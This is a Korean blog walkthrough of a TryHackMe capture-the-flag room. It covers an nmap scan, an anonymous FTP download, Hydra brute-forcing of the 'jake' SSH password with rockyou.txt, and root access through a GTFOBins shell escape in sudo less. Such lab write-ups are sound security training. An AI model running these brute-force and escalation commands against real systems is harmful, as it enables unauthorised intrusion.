TASK 1 Depoly get hacking
User flag.
포트스캔 부터 하겠습니다
nmap -sV -sC -A 10.10.45.180
출력내용
nmap -sV -sC -A 10.10.45.180
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 02:51 EST
Nmap scan report for 10.10.45.180
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.63.34
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
열린포트
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
웹페이지에 들어가보겠습니다
gobuster
gobuster 을 이용하여 경로파악을 해주겠습니다
특별한건 없는거 같아 생략하겠습니다
아까 포트스캔 했을떄 ftp 서버가 열려있었습니다
ftp 서버로 로그인 해주겠습니다
ftp 10.10.45.180
get note_to_jake.txt
해당 경로에 note_to_jake.txt 가 있습니다
다운로드 받아줍시다
그다음
Amy 가 Jake 에게 비밀번호를 바꿔달라고 요청했나 보다
Jake 에 계정을 Hydra 로 크랙해봅시다
Hydra
hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://10.10.45.180
ID : Jake
PW : 987654321
이제 jake 에 아이디와 패스워드를 가지고 ssh 에 로그인을 해보겠습니다
cd /home 디렉토리 경로에
홀트라는 파일이 있었는데 거기에 user.txt 를 발견했다
Userflag : ee11cbb19052e생략
ㄴㅇㅅ !
/usr/bin/less
https://gtfobins.github.io/gtfobins/less/
less | GTFOBins
.. / less Shell File write File read SUID Sudo Shell It can be used to break out from restricted environments by spawning an interactive system shell. less /etc/profile !/bin/sh VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile v less /etc/profile v:shell Fi
gtfobins.github.io
GTFOBINS 를 확인하여 /usr/bin/less 와 관련된걸 찾아보자
nano less /etc/profile
맨밑
!/bin/sh
그럼 성공적으로 root 권한을 얻어냈습니다
Root flag : 3a9f0ea7bb980생략
난이도 : 1/10
한줄평 : 쉬운 CTF
'TryHackMe | CTF' 카테고리의 다른 글
| TryHackMe | Retro - OSCP 챌린지 (0) | 2024.12.08 |
|---|---|
| TryHackMe | Chill Hack - CTF 모의해킹 (0) | 2024.11.24 |
| TryHackMe | tomghost - CTF 모의해킹 (1) | 2024.11.17 |
| TryHackMe | LazyAdmin - CTF 모의해킹 (2) | 2024.11.10 |
| TryHackMe | Bounty Hacker - CTF 모의해킹 (2) | 2024.11.10 |